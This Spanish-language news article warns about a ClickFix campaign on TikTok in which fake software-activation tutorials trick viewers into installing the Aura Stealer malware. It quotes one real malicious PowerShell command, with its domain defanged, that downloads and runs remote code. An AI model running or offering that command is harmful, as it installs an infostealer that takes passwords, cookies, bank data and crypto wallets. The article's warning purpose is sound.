Una peligrosa campaña maliciosa fue detectada recientemente en TikTok, donde circulan videos que enseñan supuestos métodos para descargar programas como Windows, Netflix o Photoshop de forma gratuita. Detrás de esos falsos tutoriales se esconde un sofisticado fraude informático diseñado para robar información personal y financiera de los usuarios, según reveló el experto en ciberseguridad Xavier Mertens, del SANS Internet Storm Center (ISC).
(Vea también: Alertan por nueva estafa que están haciendo a usuarios de Netflix: de qué se trata)
Los videos, que se presentan con un tono casual y aparentemente inofensivo, usan explicaciones sencillas y comandos rápidos para convencer a los usuarios de ejecutar código en sus computadores. Pero en lugar de activar funciones “premium”, los comandos instalan ‘malware’. Este engaño, conocido como ClickFix, ya había sido detectado meses atrás por el portal de ciberseguridad Trend Micro, y ahora se ha expandido con fuerza en TikTok debido al alto número de usuarios jóvenes que buscan trucos tecnológicos y descargas gratuitas.
¿Cómo funciona la nueva estafa de TikTok?
Uno de los ejemplos más comunes es el de un video que promete activar Photoshop sin pagar, pidiendo al usuario copiar y ejecutar el siguiente comando en PowerShell: iex (irm slmgr[.]win/photoshop). Aunque parece una simple instrucción técnica, en realidad conecta el computador a un servidor remoto que descarga archivos maliciosos. De acuerdo con el portal Bleeping Computer, esos archivos incluyen una versión del malware Aura Stealer, un programa especializado en extraer contraseñas guardadas en navegadores, cookies de autenticación, datos bancarios y billeteras de criptomonedas.
Mertens advirtió que TikTok se ha convertido en un terreno fértil para los ciberdelincuentes, ya que la plataforma genera confianza entre sus usuarios y facilita que los videos virales se propaguen sin control. “Es una forma muy eficaz de ingeniería social. La gente confía en los creadores y no sospecha que un simple comando pueda comprometer su seguridad”, explicó el analista.
(Lea también: ¿Por qué lo llaman y no le hablan? Si se queda callado, le mete susto a llamadas ‘fantasma’)
Los expertos recomiendan que quienes hayan seguido instrucciones de estos videos cambien de inmediato todas sus contraseñas —incluyendo correo, redes sociales y cuentas bancarias—, realicen un escaneo completo con un antivirus actualizado y eviten volver a ejecutar comandos o descargas que no provengan de fuentes oficiales. Este tipo de ataques demuestra que, en Internet, lo “gratis” puede salir muy caro.
* Pulzo.com se escribe con Z
LO ÚLTIMO
.svg)
